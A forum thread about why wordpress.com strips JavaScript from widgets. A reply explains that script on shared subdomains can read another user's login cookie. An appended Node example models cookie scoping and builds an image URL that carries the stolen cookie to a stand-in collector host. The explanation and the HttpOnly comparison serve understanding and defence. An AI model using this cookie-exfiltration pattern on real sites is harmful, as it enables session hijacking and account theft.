Javascript code widgets

  • Unknown

    Hi,
    I sincerely appreciate the features provided by wordpress.com. All the features are commendable. But the only two lacking features are: 1) Javascript code widgets, 2) Followers widgets.

    Javascript enable widget:
    If you plug in the Javascript and save the text widget, everything goes blank. I understand that Javascript is stripped for security reasons on wordpress, but I guess a few Javascripts from Facebook, Twitter and other recognised services can be allowed on wordpress. What say?

    Followers Widget:
    This widget lets us know the “popularity” of our work and writings. It encourages bloggers to continue producing commendable content based on the # of people who follow their blogs. Could you please bring in the “followers” widget like Blogger?

    WordPress surpasses Blogger in many things, and the addition of these 2 above features would take wordpress to great heights.


  • Unknown

    addition of these 2 above features takes wordpress to great heights

    As both javascript and widgets containing javascript (i.e. containing bad javascript) are a serious threat to security on a multi-user blogging platform like wordpress.com, I do not hold the same viewpoint as you do.

    Always keep in mind that many known security exploits use JavaScript code to perform security breaches. Let me explain (for those who don’t already know) why wordpress.com can’t allow javascript on free hosted blogs on their wpMU (multi-user blogging platform).

    Blogs are served from {name}.wordpress.com. The WordPress cookie is delivered to any site that ends in wordpress.com. Any Javascript on the page is legitimately allowed to look up cookies that would be sent to the domain it’s served from.

    This means that if you can run Javascript on a hosted WordPress page, you can retrieve the login cookie from another WordPress user, and then pass it to an external site. (Generally by creating an image reference that includes the encoded login cookie.)

    This is just a basic part of the underlying technology of the web browser, and it’s required for sites like gmail, Yahoo!, and others to operate.

    There are ways a site can avoid this problem (generally by constantly changing the login cookie data with EVERY response, and invalidating the old ones immediately), but they require more horsepower on the backend than the blogging sites are really able to provide, and there’s still usually a small window of opportunity.

    This is why Livejournal, WordPress, and most other hosted sites disallow Javascript on their pages. I hope that helps!
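The cookie-scoping argument in the reply above, as an added example that is not part of the original thread: a small Node model of how a browser decides which cookies a page's script can read, and how an injected widget would ship them off in an image request. The host names, cookie names, cookie values and the collector URL are assumptions for illustration, not real wordpress.com details.

```javascript
// Added example (not from the thread): a small model of RFC 6265 cookie
// scoping, showing why script on one *.wordpress.com blog can read a login
// cookie set for the parent domain, and how an injected widget would ship
// it off in an image request. Runs under Node; no browser required.

// A cookie set with a Domain=wordpress.com attribute is sent to every host
// under wordpress.com; a cookie set without Domain= is host-only.
function domainMatches(host, cookie) {
  if (cookie.hostOnly) return host === cookie.domain;
  return host === cookie.domain || host.endsWith('.' + cookie.domain);
}

// What document.cookie returns for a page on `host`: every matching cookie
// that is not flagged HttpOnly, in "name=value; name=value" form.
function scriptVisibleCookies(host, jar) {
  return jar
    .filter(c => domainMatches(host, c) && !c.httpOnly)
    .map(c => `${c.name}=${c.value}`)
    .join('; ');
}

// The "image reference" trick from the reply: the stolen cookie string is
// URL-encoded into the src of an <img>, so the victim's own browser delivers
// it to the attacker's collector as an ordinary GET.
function buildExfilImageUrl(cookieString, collector) {
  return `${collector}/pixel.gif?c=${encodeURIComponent(cookieString)}`;
}

// Constructed sample cookie jar for a logged-in victim (names and values are
// assumptions, not real wordpress.com cookies).
const victimJar = [
  { name: 'wordpress_logged_in', value: 'abc123',
    domain: 'wordpress.com', hostOnly: false, httpOnly: false },
  { name: 'prefs', value: 'dark',
    domain: 'alice.wordpress.com', hostOnly: true, httpOnly: false },
];

// Same jar with the login cookie marked HttpOnly: document.cookie no longer
// exposes it, although script on a sibling subdomain can still fire
// credentialed requests that carry it.
const hardenedJar = victimJar.map(c =>
  c.name === 'wordpress_logged_in' ? { ...c, httpOnly: true } : c);

// Victim views a widget on an attacker-controlled blog, bob.wordpress.com
// (assumed host), while logged in to wordpress.com.
function demo(collector = 'https://collector.example') {
  const attackerHost = 'bob.wordpress.com';
  const leaked = scriptVisibleCookies(attackerHost, victimJar);
  return {
    leaked,                                          // login cookie is readable
    exfilUrl: buildExfilImageUrl(leaked, collector), // what <img src> would request
    afterHttpOnly: scriptVisibleCookies(attackerHost, hardenedJar),
    // A look-alike domain only shares a suffix, not a parent domain, so nothing matches.
    unrelatedHost: scriptVisibleCookies('evilwordpress.com', victimJar),
  };
}

console.log(demo());
```

Two things worth checking against your own platform: whether the session cookie carries a Domain attribute that covers every user subdomain (host-only cookies for the login host alone would not be readable from other blogs), and whether it is HttpOnly. HttpOnly closes the document.cookie read modelled here, but script running on a sibling subdomain can still drive authenticated requests, which is why the reply's conclusion, no user-supplied script on the shared domain at all, is the usual answer for multi-tenant hosts.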
